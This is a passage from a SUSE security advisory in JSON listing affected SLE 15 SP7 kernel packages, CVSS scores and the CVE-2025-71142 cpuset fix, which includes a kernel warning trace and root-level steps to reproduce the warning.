"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71141"
},
{
"cve": "CVE-2025-71142",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71142"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpuset: fix warning when disabling remote partition\n\nA warning was triggered as follows:\n\nWARNING: kernel/cgroup/cpuset.c:1651 at remote_partition_disable+0xf7/0x110\nRIP: 0010:remote_partition_disable+0xf7/0x110\nRSP: 0018:ffffc90001947d88 EFLAGS: 00000206\nRAX: 0000000000007fff RBX: ffff888103b6e000 RCX: 0000000000006f40\nRDX: 0000000000006f00 RSI: ffffc90001947da8 RDI: ffff888103b6e000\nRBP: ffff888103b6e000 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000001 R11: ffff88810b2e2728 R12: ffffc90001947da8\nR13: 0000000000000000 R14: ffffc90001947da8 R15: ffff8881081f1c00\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f55c8bbe0b2 CR3: 000000010b14c000 CR4: 00000000000006f0\nCall Trace:\n \u003cTASK\u003e\n update_prstate+0x2d3/0x580\n cpuset_partition_write+0x94/0xf0\n kernfs_fop_write_iter+0x147/0x200\n vfs_write+0x35d/0x500\n ksys_write+0x66/0xe0\n do_syscall_64+0x6b/0x390\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\nRIP: 0033:0x7f55c8cd4887\n\nReproduction steps (on a 16-CPU machine):\n\n # cd /sys/fs/cgroup/\n # mkdir A1\n # echo +cpuset \u003e A1/cgroup.subtree_control\n # echo \"0-14\" \u003e A1/cpuset.cpus.exclusive\n # mkdir A1/A2\n # echo \"0-14\" \u003e A1/A2/cpuset.cpus.exclusive\n # echo \"root\" \u003e A1/A2/cpuset.cpus.partition\n # echo 0 \u003e /sys/devices/system/cpu/cpu15/online\n # echo member \u003e A1/A2/cpuset.cpus.partition\n\nWhen CPU 15 is offlined, subpartitions_cpus gets cleared because no CPUs\nremain available for the top_cpuset, forcing partitions to share CPUs with\nthe top_cpuset. In this scenario, disabling the remote partition triggers\na warning stating that effective_xcpus is not a subset of\nsubpartitions_cpus. Partitions should be invalidated in this case to\ninform users that the partition is now invalid(cpus are shared with\ntop_cpuset).\n\nTo fix this issue:\n1. Only emit the warning only if subpartitions_cpus is not empty and the\n effective_xcpus is not a subset of subpartitions_cpus.\n2. During the CPU hotplug process, invalidate partitions if\n subpartitions_cpus is empty.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71142",
"url": "https://www.suse.com/security/cve/CVE-2025-71142"
},
{
"category": "external",
"summary": "SUSE Bug 1256748 for CVE-2025-71142",
"url": "https://bugzilla.suse.com/1256748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
